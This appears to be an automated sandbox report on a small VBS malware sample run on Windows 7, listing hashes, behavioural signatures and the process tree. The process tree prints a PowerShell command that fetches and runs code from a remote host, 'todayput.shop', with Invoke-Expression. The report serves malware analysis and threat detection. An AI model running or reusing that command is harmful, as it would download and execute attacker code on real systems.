Analysis
-
max time kernel
91s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
10-12-2024 10:32
Static task
static1
Behavioral task
behavioral1
Sample
filter0912.2.vbs
Resource
win7-20240729-en
windows7-x64
5 signatures
150 seconds
General
-
Target
filter0912.2.vbs
-
Size
250B
-
MD5
0f5e506c6622ef23867764b600e2c4b4
-
SHA1
e6b079ecc9537672cc3b8390b0509770045b9bbd
-
SHA256
793b4e318eba9ef99173836a92ef2959a9ff73026647c0714ab7280f0dbe3fac
-
SHA512
48fca5308d3a37a7ab974c299c689ce8122b355eb44fe8bc033c80481f73fe74c13586b122d8e86fcd4d26d24153e5a034a8e7262801e3716a2010cbbc8f0b85
Score
3/10
Malware Config
Signatures
-
pid Process 2756 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2756 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2464 wrote to memory of 2756 2464 WScript.exe 30 PID 2464 wrote to memory of 2756 2464 WScript.exe 30 PID 2464 wrote to memory of 2756 2464 WScript.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\filter0912.2.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (Invoke-RestMethod -Uri http://todayput.shop:8080/wntpswdm)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2756
-